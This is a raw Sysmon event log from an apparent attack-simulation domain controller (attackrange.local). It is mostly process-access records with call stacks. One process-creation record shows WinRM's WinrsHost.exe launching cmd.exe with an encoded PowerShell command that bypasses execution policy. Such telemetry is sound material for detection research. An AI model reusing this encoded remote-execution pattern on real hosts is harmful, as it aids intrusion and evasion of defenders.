12:01:27.705{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003476Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.705{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003475Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.705{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003474Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.705{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003473Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.705{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003472Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.705{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-6497-6064-8800-00000000AE01}4812C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000003471Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.705{266CAFBE-6497-6064-8600-00000000AE01}46324780C:\Windows\system32\WinrsHost.exe{266CAFBE-6497-6064-8800-00000000AE01}4812C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 154100x80000000000000003470Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.705{266CAFBE-6497-6064-8800-00000000AE01}4812C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand dwBoAG8AYQBtAGkAC:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-6497-6064-FF70-070000000000}0x770ff0HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-6497-6064-8600-00000000AE01}4632C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x80000000000000003469Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.689{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003468Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.689{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003467Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.689{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003466Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.689{266CAFBE-646A-6064-0B00-00000000AE01}8562292C:\Windows\system32\lsass.exe{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\system32\dns.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+304a5|C:\Windows\system32\lsasrv.dll+2e33b|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000003465Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.674{266CAFBE-646C-6064-1500-00000000AE01}13161696C:\Windows\system32\svchost.exe{266CAFBE-6497-6064-8600-00000000AE01}4632C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x80000000000000003464Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.658{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6497-6064-8600-00000000AE01}4632C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003463Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.658{266CAFBE-6497-6064-8700-00000000AE01}12202076C:\Windows\system32\conhost.exe{266CAFBE-6497-6064-8600-00000000AE01}4632C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003462Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.643{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-6497-6064-8700-00000000AE01}1220C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000003461Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.643{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003460Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.643{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003459Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.643{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003458Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.643{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003457Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.643{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003456Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.643{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003455Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.643{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003454Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.643{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003453Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.643{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003452Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:27.643{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-6497-6064-8600-00000000AE01}4632C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000003451Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 